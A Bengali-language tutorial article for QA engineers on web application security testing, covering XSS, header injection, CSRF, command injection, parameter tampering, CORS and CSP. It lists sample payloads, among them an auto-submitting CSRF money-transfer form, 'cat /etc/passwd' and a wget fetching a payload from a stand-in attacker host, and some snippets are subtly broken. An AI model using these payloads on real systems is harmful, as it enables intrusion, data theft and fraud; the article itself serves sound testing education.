paint-brush
সাইবারসিকিউরিটি প্রয়োজনীয়তা: QA ইঞ্জিনিয়ারদের জন্য ব্যবহারিক ওয়েব অ্যাপ নিরাপত্তা পরীক্ষার টিপসদ্বারা@shad0wpuppet
24,039 পড়া
24,039 পড়া

সাইবারসিকিউরিটি প্রয়োজনীয়তা: QA ইঞ্জিনিয়ারদের জন্য ব্যবহারিক ওয়েব অ্যাপ নিরাপত্তা পরীক্ষার টিপস

দ্বারা Konstantin Sakhchinskiy10m2024/01/24
Read on Terminal Reader
Read this story w/o Javascript

অতিদীর্ঘ; পড়তে

XSS, হেডার ইনজেকশন, CSRF, RCE, ওয়েব প্যারামিটার টেম্পারিং, CORS, এবং বিষয়বস্তু নিরাপত্তা নীতির মতো দুর্বলতার উপর ফোকাস করে ওয়েব অ্যাপ নিরাপত্তা পরীক্ষার দক্ষতা বাড়ানোর জন্য ব্যবহারিক অন্তর্দৃষ্টি এবং টিপস। এটির লক্ষ্য সফ্টওয়্যার QA এবং সাইবার নিরাপত্তার মধ্যে ব্যবধান পূরণ করা, QA পেশাদারদের ক্ষমতায়ন করা যাতে নিরাপত্তা ত্রুটিগুলি প্রাথমিক সনাক্তকরণ এবং প্রশমনে অবদান রাখতে পারে৷ সাইবারসিকিউরিটি এবং QA-এর মধ্যে সহযোগিতাকে সফ্টওয়্যার ডেভেলপমেন্ট, ডেটা, খ্যাতি এবং আর্থিক স্থিতিশীলতার সুরক্ষার জন্য একীভূত এবং সক্রিয় পদ্ধতির জন্য গুরুত্বপূর্ণ হিসাবে হাইলাইট করা হয়েছে। নিবন্ধটি নিয়ন্ত্রিত পরিবেশের মধ্যে নৈতিক অনুপ্রবেশ পরীক্ষার উপর জোর দেয়।
featured image - সাইবারসিকিউরিটি প্রয়োজনীয়তা: QA ইঞ্জিনিয়ারদের জন্য ব্যবহারিক ওয়েব অ্যাপ নিরাপত্তা পরীক্ষার টিপস
Konstantin Sakhchinskiy HackerNoon profile picture
0-item


এই নিবন্ধটি মৌলিক দুর্বলতা এবং পরীক্ষার কৌশলগুলি অন্বেষণ করে, আপনার ওয়েব অ্যাপ পেনটেস্টিং দক্ষতা বাড়াতে ব্যবহারিক অন্তর্দৃষ্টি প্রদান করে। নিবন্ধটি QA প্রকৌশলী এবং বিশ্লেষকদের জন্য নিবেদিত আমার পোস্টগুলির একটি সিরিজকে একত্রিত করে, যা মৌলিক সাইবার নিরাপত্তা দুর্বলতাগুলির একটি ব্যবহারিক অনুসন্ধান প্রদান করে। উদ্দেশ্য হল QA প্রকৌশলী/পরীক্ষক/বিশ্লেষকদের জ্ঞান দিয়ে ক্ষমতায়ন করা যা সফ্টওয়্যার QA এবং সাইবার নিরাপত্তার মধ্যে ব্যবধান পূরণ করে, ওয়েব অ্যাপ্লিকেশনগুলির অখণ্ডতা এবং নিরাপত্তা নিশ্চিত করার জন্য একীভূত পদ্ধতির উত্সাহ দেয়৷


এটি একটি চূড়ান্ত নির্দেশিকা নয়, তবে আমি সাইবার নিরাপত্তা ক্ষেত্রে আগ্রহী একজন QA প্রকৌশলী হিসেবে আমার অভিজ্ঞতা শেয়ার করতে চাই; আপনি যদি কিছু দিক গভীরভাবে শিখতে আগ্রহী হন তবে কিছু দরকারী লিঙ্ক সহ এটি বেশ ভাসা ভাসা তথ্য হবে।

1. XSS (ক্রস-সাইট স্ক্রিপ্টিং)

একটি জটিল এবং সবচেয়ে সাধারণ দুর্বলতা হল XSS - https://owasp.org/www-community/attacks/xss/

আমি ক্ষেত্র এবং ফ্রন্টএন্ড ডেভ প্রযুক্তিতে বিস্তৃত জ্ঞান ছাড়াই XSS এর জন্য কীভাবে পরীক্ষা করতে হয় সে সম্পর্কে একটি সহজ পদ্ধতি এবং টিপস শেয়ার করব।


  • উদাহরণস্বরূপ, আপনার অ্যাপের ইনপুট ক্ষেত্রগুলিতে একটি স্ক্রিপ্ট ট্যাগ লিখুন, কিছু JS কোড অনুসরণ করুন।
 <script>alert('XSS');</script> (%0ejavascript:alert(/XSS/))
  • ইনপুট জমা দিন এবং দেখুন স্ক্রিপ্ট কার্যকর হয় কিনা।

  • যদি এটি করে, তাহলে অ্যাপ্লিকেশনটি XSS আক্রমণের জন্য ঝুঁকিপূর্ণ।

  • যদি স্ক্রিপ্টটি কার্যকর না হয়, তাহলে অন্যান্য HTML ট্যাগ যোগ করে ইনপুট পরিবর্তন করার চেষ্টা করুন, যেমন <img> বা <iframe>, এবং দেখুন যে সেগুলি পৃষ্ঠায় প্রতিফলিত হয় কিনা, যেমন (এই উদাহরণটি প্রায় সবসময় আমার জন্য কাজ করে)

     <b>t</b>#`"/*—est
  • আপনি আপনার ওয়েব অ্যাপ ইউআরএল বা ব্যবহারকারীর নাম, আপলোড করা ফাইলের নাম ( https://github.com/cure53/H5SC ), অথবা যে কোনো টেক্সট যা আপনি পরিবর্তন করতে পারবেন এমন অ্যাপ পৃষ্ঠায় প্রদর্শিত হবে এমন প্রশ্নের প্যারামে একটি স্ক্রিপ্ট যোগ করতে পারেন .

  • ইনপুটগুলির সম্মুখ-প্রান্তের বৈধতা সম্পর্কে সচেতন হন। সর্বদা একটি সরাসরি অনুরোধ (পোস্টম্যান, বার্প বা অনুরূপ সরঞ্জাম ব্যবহার করে) ব্যবহার করে মান জমা দেওয়ার চেষ্টা করুন।

  • ফাজিং এবং পেলোডগুলির একটি তালিকা ব্যবহার করুন - যখন সম্ভব তখন এই পদ্ধতিটিকে স্বয়ংক্রিয় করুন বা এটির জন্য বিশেষ সরঞ্জামগুলি ব্যবহার করুন৷


টুলস সম্পর্কে বলতে গেলে, XSS আবিষ্কার করার জন্য, বিভিন্ন চেষ্টা করার জন্য, বিভিন্ন অ্যাপের সাথে একাধিকবার ফলাফলের তুলনা করার জন্য এবং আপনার সবচেয়ে পছন্দের একটি বেছে নেওয়ার জন্য সেগুলি প্রচুর আছে: https://linuxhint.com/free_xss_tools/ (আমি অনেক ব্যবহার করেছি OWASP ZAP এবং BurpSuite)।

ব্যক্তিগতভাবে, আমি এখান থেকে পেলোড এবং তথ্য ব্যবহার করতে পছন্দ করি - https://github.com/s0md3v/AwesomeXSS - একটি খুব দরকারী সম্পদ, আমার মতে।


XSS এবং পেলোড সম্পর্কে আরও বিশদ বিবরণের জন্য, আপনি নিম্নলিখিত সংস্থানগুলি খুঁজে পেতে পারেন:

2. হেডার ইনজেকশন

এই দুর্বলতা তখন ঘটে যখন একজন আক্রমণকারী একটি ওয়েবসাইটের শিরোনামে দূষিত কোড ইনজেকশন করতে পারে, যা তাদেরকে অননুমোদিত ক্রিয়া সম্পাদন করতে বা সংবেদনশীল তথ্য অ্যাক্সেস করতে দেয়।

হেডার ইনজেকশন পরীক্ষা করতে, আপনি কয়েকটি ধাপ অনুসরণ করতে পারেন:


  • পোস্টম্যান, বার্প, বা অন্য যেকোন অনুরূপ সরঞ্জামগুলি ব্যবহার করুন HTTP শিরোনামগুলিকে ম্যানিপুলেট করতে এবং দেখুন আপনি কোনও অননুমোদিত শিরোনাম যোগ করতে পারেন বা বিদ্যমানগুলি সংশোধন করতে পারেন কিনা৷
  • সার্ভার প্রতিক্রিয়া শিরোনামে সংবেদনশীল তথ্য পাঠাচ্ছে কিনা তা পরীক্ষা করুন।
  • দূষিত বিষয়বস্তু যোগ করে বা তাদের মান পরিবর্তন করে কুকিজ ম্যানিপুলেট করার চেষ্টা করুন। হেডার ইনজেকশনের জন্য পরীক্ষা করার জন্য একটি পেলোডের একটি উদাহরণ হল হেডার ক্ষেত্রে একটি নতুন লাইন অক্ষর অন্তর্ভুক্ত করা, তারপরে অতিরিক্ত শিরোনামগুলি।
 (%0d%0a OR \r\n)

উদাহরণস্বরূপ, একটি সেট-কুকি হেডার ইনজেক্ট করতে নিম্নলিখিত পেলোড ব্যবহার করা যেতে পারে:

 User-Agent: Mozilla/5.0\r\nSet-Cookie: sessionid=111111 https:// yoursite. com?cookie=123%0D%0ASet-Cookie%3A%20TESTCOOKIE=hacked

আরেকটি উদাহরণ হল হোস্ট হেডার ইনজেকশন, যেখানে একজন আক্রমণকারী একই সার্ভারে অন্য ওয়েবসাইট বা সাবডোমেন অ্যাক্সেস করার জন্য হোস্ট হেডারকে ম্যানিপুলেট করতে পারে। উদাহরণ স্বরূপ:

 Host: yoursite.com\r\n\r\nGET /admin HTTP/1.1\r\nHost: admin.yoursite.com


হেডার ইনজেকশন সম্পর্কে আরও জানতে, আপনি নিম্নলিখিত সংস্থানগুলি উল্লেখ করতে পারেন:


3. CSRF (ক্রস-সাইট অনুরোধ জালিয়াতি)

CSRF তখন ঘটে যখন একটি দূষিত ওয়েবসাইট ব্যবহারকারীকে একটি ভিন্ন ওয়েবসাইটে অভিনয় করতে প্ররোচিত করে যেখানে ব্যবহারকারী বর্তমানে লগ ইন করা আছে। এই ধরনের আক্রমণের ফলে ব্যবহারকারীর পক্ষ থেকে অননুমোদিত অ্যাকশন (যেকোনো POST অনুরোধ) করা হতে পারে।

CSRF দুর্বলতা পরীক্ষা করতে, সংক্ষেপে, আপনি নিম্নলিখিতগুলি করতে পারেন:


  • সংবেদনশীল ক্রিয়াগুলি সম্পাদন করে এমন কোনও ফর্ম বা ক্রিয়া ওয়েবসাইটের সন্ধান করুন, এটি পাসওয়ার্ড পরিবর্তন করা বা লেনদেন করা হতে পারে (বা অন্য কোনও পোস্টের অনুরোধ যা ব্যবহারকারীদের পক্ষে ক্ষতিকারক হতে পারে যদি সেগুলি ব্যবহারকারীর পক্ষে তাদের অজান্তে করা হয়)।
  • একটি HTML পৃষ্ঠা বা কোড স্নিপেট তৈরি করুন যাতে একটি লুকানো ফর্ম থাকে যা একই ক্রিয়া সম্পাদন করে, উদাহরণস্বরূপ:
 <html> <body onload="document.forms[0].submit()"> <form action="https:// yoursite .com /money_transfer" method="POST"> <input type="hidden" name="toAccount" value="attackerAccount"> <input type="hidden" name="amount" value="1000"> </form> </body> </html>


  • এই কোডটিকে একটি HTML ফাইল হিসাবে সংরক্ষণ করুন এবং আপনি যে সাইটটি পরীক্ষা করেছেন সেখানে আপনি লগ ইন করেছেন সেই একই ব্রাউজারে এটি খুলুন৷
  • ব্যবহারকারীর জ্ঞান বা অনুমতি ছাড়াই কাজটি করা হয়েছে কিনা তা পরীক্ষা করুন। 2 থেকে উদাহরণে, ব্যবহারকারীকে এমন একটি ওয়েবসাইট দেখার জন্য প্রতারিত করা হয় যা লক্ষ্য ওয়েবসাইটে আক্রমণকারীর অ্যাকাউন্টে 1000 স্থানান্তর করার জন্য স্বয়ংক্রিয়ভাবে একটি লুকানো ফর্ম জমা দেয়।


CSRF আক্রমণ প্রতিরোধ করতে, অনুরোধের উত্স যাচাই করতে অ্যান্টি-CSRF টোকেন বা একই-সাইট কুকি ব্যবহার করুন। এই টোকেনগুলি হল অনন্য মান যা সার্ভার দ্বারা তৈরি করা হয় এবং ফর্ম বা URL প্যারামিটারে অন্তর্ভুক্ত করা হয়। যখন ফর্মটি জমা দেওয়া হয়, সার্ভারটি টোকেনটি প্রত্যাশিত মানের সাথে মেলে কিনা তা পরীক্ষা করে এবং যদি না মেলে তবে অনুরোধটি প্রত্যাখ্যান করে। এখানে পাইথনের একটি উদাহরণ:

 import requests # Get the CSRF token from the cookie def get_csrf_token(): cookie = requests.utils.dict_from_cookiejar(requests.cookies) return cookie.get('csrfToken') # Send an HTTP request with the CSRF token in the headers def send_http_request(url, data): csrf_token = get_csrf_token() headers = { 'Content-Type': 'application/json', 'X-CSRF-TOKEN': csrf_token } response = requests.post(url, headers=headers, data=data) return response


দরকারী সম্পদ:


4. RCE (রিমোট কোড এক্সিকিউশন) এবং কমান্ড ইনজেকশন

আরসিই এবং কমান্ড ইনজেকশন দুর্বলতা দেখা দেয় যখন আক্রমণকারীরা একটি টার্গেট সিস্টেমে নির্বিচারে কোড বা OS কমান্ড চালাতে পারে। এই ধরনের আক্রমণের ফলে সিস্টেমের সম্পূর্ণ আপস এবং সংবেদনশীল ডেটাতে অননুমোদিত অ্যাক্সেস হতে পারে।

RCE এবং কমান্ড ইনজেকশন দুর্বলতা পরীক্ষা করতে, সংক্ষেপে, আপনি নিম্নলিখিতগুলি করতে পারেন:


  • ইনপুট ক্ষেত্র বা প্যারামিটার সনাক্ত করুন যা ম্যানিপুলেট করা যেতে পারে। এই ইনপুট ক্ষেত্র বা পরামিতিগুলি বিস্তৃত জায়গায় পাওয়া যেতে পারে, যেমন ফর্ম, URL প্যারামিটার, কুকিজ, HTTP শিরোনাম ইত্যাদি। এই ধরনের প্যারামগুলি সনাক্ত করতে, আপনি Burp Suite-এর মতো একটি টুল ব্যবহার করতে পারেন, যা আপনাকে বাধা দিতে দেয় এবং HTTP অনুরোধ এবং প্রতিক্রিয়া পরিবর্তন করুন (একটি বিনামূল্যের সংস্করণে)। Burp ইনপুট ক্ষেত্র এবং পরামিতি সহ সমস্ত অনুরোধ এবং প্রতিক্রিয়া ক্যাপচার এবং প্রদর্শন করবে। একবার আপনার প্যারামগুলি হয়ে গেলে, আপনাকে পরীক্ষা করতে হবে যে সেগুলি সন্নিবেশিত কোড বা OS কমান্ডগুলি চালানোর জন্য ব্যবহার করা যেতে পারে কিনা।
  • সেই ক্ষেত্র বা পরামিতিগুলিতে দূষিত পেলোডগুলি ইনজেক্ট করুন, এখানে কিছু সম্ভাব্য এবং সহজ উদাহরণ রয়েছে:


 ; ls -la - list the contents of a directory cat /etc/passwd - show the password file wget https://myhackersite.evil/payload - download files with malicious code from a remote server ping -c 1 https://www.linkedin.com/redir/general-malware-page?url=myhackersite%2eevil%2ecom - ping the attacker's website 3


  • পেলোড সফলভাবে চালানো হয়েছে কিনা এবং আপনার কাছে কোনো সংবেদনশীল তথ্য পাঠানো হয়েছে কিনা তা দেখতে অ্যাপ্লিকেশনটির আচরণ পরীক্ষা করুন। উদাহরণস্বরূপ, আপনি যদি ls -la ব্যবহার করেন এবং অ্যাপ্লিকেশনটি সার্ভারে ফাইল এবং ডিরেক্টরিগুলির একটি তালিকা প্রদর্শন করে, এটি নির্দেশ করে যে পেলোডটি সফলভাবে কার্যকর করা হয়েছে এবং অ্যাপ্লিকেশনটি কমান্ড ইনজেকশনের জন্য ঝুঁকিপূর্ণ।


সমস্ত পেলোডের ফলে কিছু দৃশ্যমান আউটপুট হবে না। এই ধরনের ক্ষেত্রে, আপনাকে অন্যান্য পদ্ধতি ব্যবহার করতে হতে পারে, যেমন নেটওয়ার্ক ট্র্যাফিক পর্যবেক্ষণ করা বা লগ ফাইলগুলি পর্যালোচনা করা।

RCE এবং কমান্ড ইনজেকশন আক্রমণ প্রতিরোধ করতে, ব্যবহারকারীর ইনপুট যাচাই করতে হবে, এবং দূষিত অক্ষর বা কমান্ডগুলি সরাতে হবে বা স্যানিটাইজ করতে হবে।

আরও শেখার জন্য এখানে কিছু দরকারী সংস্থান রয়েছে:


5. ওয়েব প্যারামিটার টেম্পারিং

এই ধরনের আক্রমণ ঘটে যখন আপনি ক্লায়েন্ট সাইড থেকে সার্ভার সাইডে প্রেরিত প্যারামগুলি পরিচালনা করেন, উদাহরণস্বরূপ, অননুমোদিত অ্যাক্সেস বা বিশেষাধিকার বৃদ্ধির দিকে নিয়ে যান।

এই ধরনের দুর্বলতা পরীক্ষা করতে, আপনি নিম্নলিখিতগুলি করতে পারেন:


  • ইনপুট ক্ষেত্র বা প্যারামগুলি সনাক্ত করুন যা ম্যানিপুলেট করা যেতে পারে। অন্যান্য দুর্বলতার মতো, আপনি HTTP অনুরোধ এবং প্রতিক্রিয়াগুলিকে বাধা দিতে এবং সংশোধন করতে Burp Suite এর মতো একটি টুল ব্যবহার করতে পারেন।
  • প্যারামগুলি সংশোধন করুন। উদাহরণস্বরূপ, যদি একটি প্যারামিটার একটি পণ্যের মূল্য নিয়ন্ত্রণ করে, তাহলে আপনি কম দামে আইটেম কেনার জন্য এটিকে পরিবর্তন করতে পারেন:- একটি পণ্যের মূল্য 10 থেকে 1 এ পরিবর্তন করুন।- ব্যবহারকারী আইডি পরামিতি ম্যানিপুলেট করে প্রমাণীকরণ বাইপাস করুন।- পরিবর্তন করুন একটি পণ্যের পরিমাণ অর্থ ফেরত পেতে ঋণাত্মক সংখ্যায় বা 1টি আইটেমের দামের জন্য আরও আইটেম পেতে একটি উচ্চ সংখ্যায়।
  • টেম্পারিং সফল হয়েছে কিনা তা দেখতে অ্যাপ্লিকেশনটির আচরণ পরীক্ষা করুন। উদাহরণস্বরূপ, আপনি যদি সফলভাবে মূল্য পরিবর্তন করেন, আপনি কার্ট বা রসিদ চেক করার সময় অ্যাপ্লিকেশনটি সেই পরিবর্তনটিকে প্রতিফলিত করবে।
  • এবং অবশ্যই, আপনার অনুসন্ধানগুলি devs-এর কাছে রিপোর্ট করুন যাতে তারা নিরাপত্তা ঝুঁকি হওয়ার আগেই সমস্যাটি সমাধান করতে পারে।


ওয়েব প্যারামিটার টেম্পারিং আক্রমণ প্রতিরোধ করতে, ইনপুট বৈধতা এবং স্যানিটাইজেশন অত্যন্ত গুরুত্বপূর্ণ। নিশ্চিত করুন যে সমস্ত ইনপুট ডেটা সার্ভারের পাশে যাচাই করা হয়েছে এবং অ্যাপ্লিকেশনটি কোনও দূষিত ইনপুট প্রত্যাখ্যান করে। আমি বলব যে এই ধরনের দুর্বলতাগুলি একটি QA টিমের দ্বারা চিহ্নিত করা সর্বোত্তম কারণ QAগুলি অ্যাপ্লিকেশন/পণ্য এবং এর যুক্তি এবং প্যারামগুলি ইনফোসেক ইঞ্জিনিয়ারদের থেকে ভাল জানে যারা সাধারণত dev প্রক্রিয়ার সাথে জড়িত নয়৷

ওয়েব প্যারামিটার টেম্পারিং সম্পর্কে আরও জানতে সাহায্য করার জন্য এখানে কিছু অতিরিক্ত সংস্থান রয়েছে:


6. ক্রস-অরিজিন রিসোর্স শেয়ারিং (CORS)

এটি একটি নিরাপত্তা ব্যবস্থা যা ওয়েব পৃষ্ঠাগুলিকে ওয়েব পৃষ্ঠাটি পরিবেশন করা ডোমেনের চেয়ে ভিন্ন ডোমেনে অনুরোধ করা থেকে সীমাবদ্ধ করে৷

আপনি নিম্নলিখিত কাজ করে পরীক্ষা করতে পারেন:


  • ব্রাউজারে যেকোন ডোমেইন খুলুন (যেমন, google. com) যেখান থেকে আপনার হোস্ট অ্যাক্সেস করা নিষিদ্ধ করা উচিত।
  • ব্রাউজার কনসোলে এই কমান্ডটি ব্যবহার করুন:
 fetch('https://beapimysite.com') .then(response=>response.json()) .then(data=>{ console.log(data); })
  • সবকিছু সঠিকভাবে কনফিগার করা হলে, আপনি নিম্নলিখিত পেতে হবে:
 access to fetch at 'https://beapimysite.com' from origin 'https://www. google.com' has been blocked by CORS policy: No 'Access-Control-Allow-Origin' header is present on the requested resource.

এই সহজ পদক্ষেপগুলি করুন:


  1. অনুরোধের সাথে জড়িত উত্স এবং গন্তব্য ডোমেন খুঁজুন। অরিজিন ডোমেন হল অনুরোধ করা ওয়েব পেজের ডোমেন এবং গন্তব্য ডোমেন হল সেই ডোমেন যেখানে অনুরোধ পাঠানো হচ্ছে।
  2. পোস্টম্যানের মতো একটি টুল ব্যবহার করে, মূল ডোমেন থেকে গন্তব্য ডোমেনে একটি অনুরোধ পাঠান। অনুরোধটি একটি ক্রস-অরিজিন অনুরোধ তা নির্দেশ করার জন্য উপযুক্ত শিরোনামগুলি অন্তর্ভুক্ত করা নিশ্চিত করুন৷
  3. অরিজিন ডোমেন থেকে অনুরোধটি অনুমোদিত তা নির্দেশ করার জন্য সার্ভারের প্রতিক্রিয়াতে অ্যাক্সেস-কন্ট্রোল-অনুমতি-অরিজিন শিরোনাম অন্তর্ভুক্ত করা উচিত। যদি এই শিরোনামটি অনুপস্থিত থাকে বা একটি ভিন্ন মান সেট করা থাকে, তাহলে এটি অ্যাপ্লিকেশনে একটি দুর্বলতা নির্দেশ করতে পারে।
  4. যদি অ্যাক্সেস-কন্ট্রোল-অ্যালো-অরিজিন হেডারটি অনুপস্থিত থাকে বা একটি মান সেট করা থাকে, তাহলে অনুরোধটি পরিবর্তন করে সীমাবদ্ধতাগুলি বাইপাস করার চেষ্টা করুন। উদাহরণস্বরূপ, আপনি গন্তব্য ডোমেনের সাথে মেলে বা একটি ভিন্ন HTTP পদ্ধতি ব্যবহার করে অরিজিন হেডার পরিবর্তন করার চেষ্টা করতে পারেন। এখানে পরীক্ষা করার জন্য কিছু উদাহরণ অনুরোধ রয়েছে:
 Request from https://mysite.com to https://beapimysite.com: GET /api/data HTTP/1.1 Host: beapimysite.com Origin: https ://mysite.com Access-Control-Request-Method: GET Access-Control-Request-Headers: X-Requested-With

প্রতিক্রিয়া:

 HTTP/1.1 200 OK Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, OPTIONS Access-Control-Allow-Headers: X-Requested-With


CORS সম্পর্কে আরও তথ্যের জন্য, এখানে কিছু সহায়ক সংস্থান রয়েছে:


7. কন্টেন্ট সিকিউরিটি পলিসি (CSP) হেডার সেট করা হয়নি

CSP হল এমন একটি মেকানিজম যা ওয়েব পৃষ্ঠাগুলিতে কোন বিষয়বস্তুর উৎসগুলিকে লোড করার অনুমতি দেওয়া হয়েছে তা নির্দিষ্ট করে XSS আক্রমণ প্রতিরোধ করতে সাহায্য করে৷ একটি CSP হেডার সেট ছাড়া, পৃষ্ঠায় ক্ষতিকারক স্ক্রিপ্ট ইনজেক্ট করা এবং ব্যবহারকারীর সংবেদনশীল ডেটা চুরি করা বা অন্যান্য ক্রিয়া সম্পাদন করা সম্ভাব্য।

CSP হেডার চেক করতে আপনি নিম্নলিখিতগুলি করতে পারেন:


  • আপনি একটি ব্রাউজারে পরীক্ষা করতে চান ওয়েব পৃষ্ঠা খুলুন.
  • আপনার ব্রাউজারে ডেভ টুল খুলুন এবং কনসোলে যান।
  • নিম্নলিখিত কোড লিখুন:
 document.cookie=TESTCOOKIE=XSS;


  • এটি সফলভাবে চালানো হলে - কোন ত্রুটি বার্তা. এটি ইঙ্গিত দেয় যে পৃষ্ঠাটি XSS-এর জন্য সম্ভাব্য ঝুঁকিপূর্ণ কারণ এটি একটি বহিরাগত উত্স থেকে কুকি সেট করার অনুমতি দেয়৷


পৃষ্ঠায় একটি স্ক্রিপ্ট ইনজেক্ট করার চেষ্টা করুন এবং দেখুন এটি কার্যকর হয় কিনা। উদাহরণস্বরূপ, ব্রাউজার কনসোলে নিম্নলিখিত কোড ঢোকান:

 var script = document.create; Element('script');script.src = 'http://dangeroussite.com/dolphin.js'; document.head.appendChild(script);

প্রতিক্রিয়া শিরোনামগুলিতে বিষয়বস্তু-নিরাপত্তা-নীতি শিরোনামটি সন্ধান করুন৷ যদি এই শিরোনামটি অনুপস্থিত থাকে, তাহলে এর মানে হল ওয়েব পৃষ্ঠাটিতে কোনো CSP হেডার সেট নেই।

ওয়েব অ্যাপ নিরাপত্তার ক্ষেত্রে CSP হেডার একটি গুরুত্বপূর্ণ বিষয়।


CSP সম্পর্কে আরও তথ্যের জন্য:




সাইবার সিকিউরিটি এবং সফ্টওয়্যার QA-এর মধ্যে সিম্বিওটিক সম্পর্ক সফ্টওয়্যার অ্যাপগুলির নিরাপত্তার ক্ষেত্রে গুরুত্বপূর্ণ৷ হুমকি মডেলিং পদ্ধতি এবং স্বয়ংক্রিয় ফাজ টেস্টিং কৌশলগুলির একীকরণের মাধ্যমে, QA প্রকৌশলীরা নিরাপত্তা দুর্বলতাগুলির প্রাথমিক সনাক্তকরণ এবং প্রশমনে উল্লেখযোগ্যভাবে অবদান রাখে। সাইবারসিকিউরিটি এবং QA টিমের মধ্যে সহযোগিতা সফ্টওয়্যার ডেভেলপমেন্টের জন্য একীভূত পদ্ধতির একটি অবিচ্ছেদ্য অংশ গঠন করে, QA-এর ভূমিকা কার্যকরী এবং ব্যবহারযোগ্যতা পরীক্ষার বাইরেও প্রসারিত যাতে সম্ভাব্য নিরাপত্তা ত্রুটিগুলির সক্রিয় সনাক্তকরণ এবং সংশোধন করা যায়। সাইবার নিরাপত্তা প্রচেষ্টায় QA-কে একটি কৌশলগত সম্পদ হিসেবে স্বীকৃতি দেওয়া গুরুত্বপূর্ণ, কারণ এটি শুধুমাত্র ডেটা সুরক্ষা বাড়ায় না বরং একটি কোম্পানির সুনাম, গ্রাহকের আস্থা এবং সামগ্রিক আর্থিক স্থিতিশীলতাও রক্ষা করে। QA পেশাদারদের প্রযুক্তিগত দক্ষতা, তাদের কঠোর পরীক্ষার অনুশীলনের সাথে, সাইবার হুমকির বিরুদ্ধে একটি শক্তিশালী প্রতিরক্ষা স্থাপন করে।

একটি গুরুত্বপূর্ণ অনুস্মারক:

সর্বদা সুস্পষ্ট অনুমতি সহ এবং একটি নিয়ন্ত্রিত পরিবেশের মধ্যে অনুপ্রবেশ পরীক্ষা পরিচালনা করুন। এই নৈতিক দৃষ্টিভঙ্গি নিশ্চিত করে যে নিরাপত্তা মূল্যায়ন দায়িত্বশীল পরীক্ষার প্রোটোকলের সাথে সারিবদ্ধ করে, সিস্টেমের সাথে অসাবধানতাপূর্ণ আপস প্রতিরোধ করে এবং পরীক্ষা প্রক্রিয়া এবং সাইবার নিরাপত্তা কৌশল উভয়েরই অখণ্ডতা বজায় রাখে।


এই নিবন্ধটি QA ইঞ্জিনিয়ারদের জন্য ওয়েব অ্যাপ নিরাপত্তা পরীক্ষা, সংযোগ সফ্টওয়্যার QA এবং সাইবার নিরাপত্তা উন্নত করার জন্য ব্যবহারিক টিপস শেয়ার করে। যারা আরও জানতে চান তাদের জন্য অন্তর্দৃষ্টি এবং দরকারী লিঙ্ক সহ এটি একটি শিক্ষানবিস-বান্ধব গাইড৷


এছাড়াও এখানে প্রকাশিত.